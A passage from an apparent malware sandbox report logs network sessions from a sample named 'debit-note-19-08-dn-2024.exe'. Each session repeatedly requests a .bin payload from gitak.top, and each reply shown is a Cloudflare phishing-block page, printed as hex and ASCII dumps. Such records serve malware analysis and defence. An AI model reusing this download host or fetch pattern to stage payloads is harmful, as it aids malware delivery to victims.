                              2024-08-26 13:33:48 UTC1369INData Raw: 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 35 4d 39 44 33 51 32 51 73 34 55 78 43 6d 32 71 56 37 4a 45 6c 7a 46 6d 64 59 32 50 36 34 44 68 4d 5a 4b 69 4f 39 4d 56 73 50 34 2d 31 37 32 34 36 37 39 32 32 38 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65
                              Data Ascii: nput type="hidden" name="atok" value="5M9D3Q2Qs4UxCm2qV7JElzFmdY2P64DhMZKiO9MVsP4-1724679228-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style
                              2024-08-26 13:33:48 UTC848INData Raw: 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e
                              Data Ascii: :hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a>
                              2024-08-26 13:33:48 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              10192.168.11.2049827172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:33:58 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:33:59 UTC543INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:33:59 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Dr4eipM90yRhTz4glTbMKUP%2BBz41de16B%2F74VfA%2FvwI2q4M6j0ji94QqgHr2aJF%2FY3uUCM5xhKQ6kLC75ZRel4j22aFWefKm4fStOJQOtXAC8W9z48brtZF%2BSo%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b94325ca8da59fd-IAD
                              2024-08-26 13:33:59 UTC826INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:33:59 UTC1369INData Raw: 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74
                              Data Ascii: s.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert
                              2024-08-26 13:33:59 UTC1369INData Raw: 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 53 46 4d 6e 35 35 69 41 65 37 71 72 51 77 66 73 39 43 63 75 77 41 66 48 6d 6f 70 36 68 2e 78 51 54 72 4d 45 71 44 72 46 4a 57 45 2d 31 37 32 34 36 37 39 32 33 39 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22
                              Data Ascii: <input type="hidden" name="atok" value="SFMn55iAe7qrQwfs9CcuwAfHmop6h.xQTrMEqDrFJWE-1724679239-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn"
                              2024-08-26 13:33:59 UTC854INData Raw: 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61
                              Data Ascii: tor sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudfla
                              2024-08-26 13:33:59 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              11192.168.11.2049828172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:34:09 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:34:09 UTC543INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:34:09 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jStPBOkm31F2dErQybvC3S3feBIQL%2B9xPOkPA6C3QvECveD9Dy1gbXf8X8Y7qGZOuO6qdZ85MuF%2BVM%2FBLoMmYMDjOvcCY8BgzOfqJqU%2BVPtCT%2Bz2DKB50Atpc0A%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b94329e3f303b38-IAD
                              2024-08-26 13:34:09 UTC826INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:34:09 UTC1369INData Raw: 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74
                              Data Ascii: s.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert
                              2024-08-26 13:34:09 UTC1369INData Raw: 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 47 6d 49 46 4f 69 37 76 38 79 38 69 48 31 35 53 4a 35 64 36 31 50 41 36 4a 49 68 48 70 4c 4f 4e 62 78 5f 2e 73 34 6e 68 6f 56 55 2d 31 37 32 34 36 37 39 32 34 39 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22
                              Data Ascii: <input type="hidden" name="atok" value="GmIFOi7v8y8iH15SJ5d61PA6JIhHpLONbx_.s4nhoVU-1724679249-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn"
                              2024-08-26 13:34:09 UTC854INData Raw: 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61
                              Data Ascii: tor sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudfla
                              2024-08-26 13:34:09 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              12192.168.11.2049829172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:34:19 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:34:20 UTC541INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:34:20 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tqxX%2F13uaWVnLImilppCmvKcd0szd7azEzboHsYoUwg8gkOT0kV3ruDxi9YPRi%2B3qRan3x6tFb%2FgAD%2Fe6eWxr4G4t2oSHRYRu055iA93W7y6ouTKshaKT6reQmw%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9432dffdfe0a87-IAD
                              2024-08-26 13:34:20 UTC828INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:34:20 UTC1369INData Raw: 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29
                              Data Ascii: ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert')
                              2024-08-26 13:34:20 UTC1369INData Raw: 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 31 47 70 63 4d 49 47 50 74 62 79 43 67 72 5a 64 69 47 79 70 38 61 6c 59 56 31 55 70 51 4a 4c 78 78 53 55 5f 58 53 61 73 58 45 6f 2d 31 37 32 34 36 37 39 32 36 30 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73
                              Data Ascii: <input type="hidden" name="atok" value="1GpcMIGPtbyCgrZdiGyp8alYV1UpQJLxxSU_XSasXEo-1724679260-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" s
                              2024-08-26 13:34:20 UTC852INData Raw: 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65
                              Data Ascii: r sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare
                              2024-08-26 13:34:20 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              13192.168.11.2049830172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:34:30 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:34:30 UTC537INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:34:30 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R%2FArnOXvmUy99IocfGQ81ZAEoS3XvF3aJv4fBVbCD9UTtPDZijvENOq80qKZJu6aA4zVk5lJL9OSFWpxt%2FwoAfAGdMilaCsF41QzTETXdPC39YnUcemwQlQsyVc%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b943321993b082f-IAD
                              2024-08-26 13:34:30 UTC832INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:34:30 UTC1369INData Raw: 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a 20 20
                              Data Ascii: ss" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
